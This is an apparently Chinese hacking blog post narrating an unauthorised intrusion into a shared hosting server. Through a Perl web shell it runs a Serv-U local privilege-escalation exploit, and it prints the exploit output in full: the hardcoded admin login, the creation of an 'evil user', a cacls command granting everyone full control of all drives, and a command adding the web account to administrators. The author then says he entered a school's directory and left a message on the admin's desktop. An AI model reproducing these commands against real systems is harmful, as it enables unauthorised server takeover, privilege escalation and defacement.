你BT我更BT——记对一台BT主机的入侵过程

核心提示： http://anyhost//cmd.pl?d:userinsu.exe "cacls.ex ... T /G everyone:F"返回下面的信息，就表示成功了！！！Serv-u >3.x Local Exploit by xiaolu<220 Ser

http://anyhost//cmd.pl?d:userinsu.exe "cacls.ex ... T /G everyone:F"

返回下面的信息，就表示成功了！！！

Serv-u >3.x Local Exploit by xiaolu　
<220 Serv-U FTP Server v5.2 for WinSock ready...　
>USER LocalAdministrator　
<331 User name okay, need password.　
******************************************************　
>PASS #l@$ak#.lk;0@P　
<230 User logged in, proceed.　
******************************************************　
>SITE MAINTENANCE　
******************************************************　
[+] Creating New Domain...　
<200-DomainID=2　
<220 Domain settings saved　
******************************************************　
[+] Domain xl:2 Created　
[+] Creating Evil User　
<200-User=xl　
200 User settings saved　
******************************************************　
[+] Now Exploiting...　
>USER xl　
<331 User name okay, need password.　
******************************************************　
>PASS 111111　
<230 User logged in, proceed.　
******************************************************　
[+] Now Executing: cacls.exe c: /E /T /G everyone:F　
<220 Domain deleted　
******************************************************

每提交完一次都稍微等一下，因为这些命令需要时间处理的，不一会儿，就把所有分区设置为 everyone 完全控制了，可以任意操作硬盘的东西了，但是有些命令还是受了限制，因为权限还没有提升，现在我们把自己的用户提升为管理员：

http://anyhost//cmd.pl?d:userinsu.exe " net l ... s IUSR_anyhost /add"

现在我们通过 web 方式，执行的命令就是以 administrator 的身份执行的了，相信到这里，下面的事该做什么，大家应该知道了吧？马上找到那个学校的目录，进去咯～～目的达到了，本来还想做一个 3389 的肉鸡的，想想算了，这种 BT 管理员的地盘，我也占领不了多久，留点提示到他的桌面就 over 了。

说真的，搞安全这么久，从来没有遇见这么棘手的虚拟主机，要不是装了 Perl，还真是束手无策！本文技术含量不高，只是分享一下希望其中的思路，如果有一个人从中受益，这篇文章就完成它的使命了。